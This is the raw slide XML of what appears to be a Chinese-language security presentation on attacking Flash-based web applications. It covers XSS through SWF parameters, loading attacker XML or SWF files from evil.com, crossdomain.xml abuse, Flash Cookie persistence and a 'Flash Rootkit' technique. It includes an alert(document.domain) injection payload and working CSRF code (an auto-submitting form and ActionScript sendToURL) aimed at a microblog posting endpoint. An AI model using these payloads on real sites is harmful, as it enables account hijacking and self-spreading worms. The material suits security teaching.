              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="default"):String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str:String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\";alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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ExternalInterface.addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("test", test);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Flash Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点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5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AS2</a:t>
            </a:r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root.argv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global.argv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_level0.argv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>局变量未初始化问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AS3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>root.loaderInfo.parameters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5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输入是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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http://foo.com/f.swf?xml=//evil.com/e.xml</a:t>
            </a:r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最喜欢的数据格式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 err="1" smtClean="0"/>
              <a:t>URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('http://evil.com/e.xml')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LocalConnection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('*')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>暴露的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相关接口可以作为输入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层面的法则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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9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LSO(Flash Cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SharedObject</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ExternalInterface.addCallback</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通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addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即可控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LSO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再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>魔法缺陷可以自动执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript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更多细节见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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flash Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>小节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输入是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://foo.com/f.swf?swf=//evil.com/e.swf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://evil.com/e.swf?swf=//foo.com/f.swf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AS2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>loadMovie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smtClean="0"/>
              <a:t>AS3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Loader() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>URLLoader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更</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多细节见：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>小节</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22025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Flash Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点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2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LoadVars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sendAndLoad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sendToURL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URLLoader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URLRequest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GET/POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>遵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>循浏览器的同源策略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Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特有的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crossdomain.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Security.allowDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>能导致意外的跨域惊喜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6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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> -l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 Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>洞挖掘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2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漏洞利用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8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洞利用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9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在利用上就是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没什么好谈的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需要特别注意的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会有如下特性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3" y="2741388"/>
            <a:ext cx="7399734" cy="39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CSRF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洞利用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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以用目标域的缺陷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来间接发送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型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，这样就带上目标域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了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r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和常规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没什么区别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>唯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一的优势：非常安静，但这点往往是致命的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>取信息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crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的授权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20072" y="4964975"/>
            <a:ext cx="343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&lt;?xml version="1.0"?&gt;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&lt;cross-domain-policy&gt;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&lt;allow-access-from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;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&lt;/cross-domain-policy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CSRF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搜狐微博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132856"/>
            <a:ext cx="68046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&lt;form action="http://t.xxx.com/article/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>updatetweet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" method="post"&gt;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&lt;input type="hidden" name="status" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html_csrf_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>." /&gt;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&lt;/form&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[0].submit();&lt;/script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成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>功后会提示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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</a:rPr>
              <a:t>文件下载提示，这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就容易暴露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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flash.net.URLRequest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function post(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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</a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("http://t.xxx.com/article/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>updatetweet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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_v = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLVariables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_v = "status="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "POST";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url.data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = _v;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sendToURL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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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post('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flash_csrf_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>完美 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:)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CSRF Worm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Fanfou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Flash Worm 2008</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 7" descr="D:\KnownSec\CSRF-苏醒的巨人\fanfou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489" y="2285843"/>
            <a:ext cx="6023022" cy="384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5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洞利用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曾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Flash Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是跨浏览器共享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对于开发人员来说这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>太酷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于攻击者来说这个特性也很酷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相比传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>易被清理掉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户即使换了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，升级了浏览器，还是可以唯一标定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>现状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Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Flash Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隔离了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0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Rootkit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洞利用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9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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点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6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LSO+allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('*')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>魔法缺陷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= Flash Rootkit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422305" y="3284984"/>
            <a:ext cx="6299389" cy="2280890"/>
            <a:chOff x="1146448" y="3065030"/>
            <a:chExt cx="6299389" cy="2280890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2668960" y="3068960"/>
              <a:ext cx="1296144" cy="7920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r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>vil Site</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>Page</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="笑脸 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1146448" y="3140968"/>
              <a:ext cx="648072" cy="64807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907704" y="3465004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668960" y="4546330"/>
              <a:ext cx="1296144" cy="7920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Foo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t> Site</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>SWF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317032" y="4059005"/>
              <a:ext cx="0" cy="30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158775" y="4018165"/>
              <a:ext cx="206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DOM object/embed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49693" y="4546330"/>
              <a:ext cx="1296144" cy="7920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Foo Site</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>LSO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153095" y="4942374"/>
              <a:ext cx="17870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150625" y="4497721"/>
              <a:ext cx="1933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FF00"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>addCallback</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Magic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55976" y="4931876"/>
              <a:ext cx="1480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</a:rPr>
                <a:t>Evil JavaScript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49693" y="3065030"/>
              <a:ext cx="1296144" cy="7920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Foo Site</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>Page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9712" y="30689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①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64414" y="400506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②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70410" y="49765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③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4078288" y="3461074"/>
              <a:ext cx="1886213" cy="971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641900" y="36043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6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Rootkit DEMO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24831"/>
            <a:ext cx="6477000" cy="4076700"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16539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一些限制的绕过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allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('*.foo.com')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>foo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面来绕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pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MITM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>劫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>持攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty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果没</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的接口？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XSF</a:t>
            </a:r>
            <a:r>
